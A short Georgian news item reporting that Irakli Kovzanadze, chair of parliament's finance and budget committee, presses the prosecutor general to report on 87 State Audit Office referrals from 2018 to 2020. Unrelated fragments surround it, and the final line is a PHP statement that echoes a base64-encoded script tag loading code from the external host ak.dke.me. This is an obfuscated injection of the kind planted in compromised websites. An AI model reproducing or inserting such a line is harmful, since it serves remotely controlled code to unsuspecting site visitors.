celsiusi
ავერსი საქკაბელი
საქართველოს პარლამენტის საფინანსო-საბიუჯეტო კომიტეტის თავმჯდომარე გენერალურ პროკურორს მიმართავს, პროკურატურის საქმიანობის წლიური ანგარიშის საქართველოს პარლამენტში წარდგენისას ყურადღება გაამახვილოს სახელმწიფო აუდიტის სამსახურის მიერ გენერალურ პროკურატურაში გადაგზავნილ მასალებზე და პარლამენტს შესაძლებლობის ფარგლებში მიაწოდოს ინფორმაცია გამოძიების თაობაზე.
 
როგორ ირაკლი კოვზანაძემ კომიტეტის სხდომაზე განაცხადა 2020 წელს პროკურატურას აუდიტის სამსახურის მიერ გადაეგზავნა 28 ანგარიში, 2019 წელს – 34, ხოლო 2018 წელს – 25.
 
„სულ 2018-2020 წლებში პროკურატურაში ჯამში გადაგზავნილია 87 საქმე, მათგან 10 საქმეზე დადგა გამამტყუნებელი განაჩენი, ან დაერთო სხვა საქმეს, ხოლო 77 საქმეზე გამოძიება ახლაც გრძელდება“, – აღნიშნა ირაკლი კოვზანაძემ და ხაზი გაუსვა, რომ ამ საქმეებზე პროკურატურის მიერ სკურპულოზური და სწრაფი გამოძიების წარმოება იქნება ქმედითი დახმარება სახელმწიფო აუდიტის სამსახურის ეფექტიანობის ამაღლების კუთხით.
 
პარლამენტის საფინანსო-საბიუჯეტო კომიტეტში სახელმწიფო აუდიტის სამსახურის 2020 წლის საქმიანობის ანგარიშს უსმენენ.
1278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");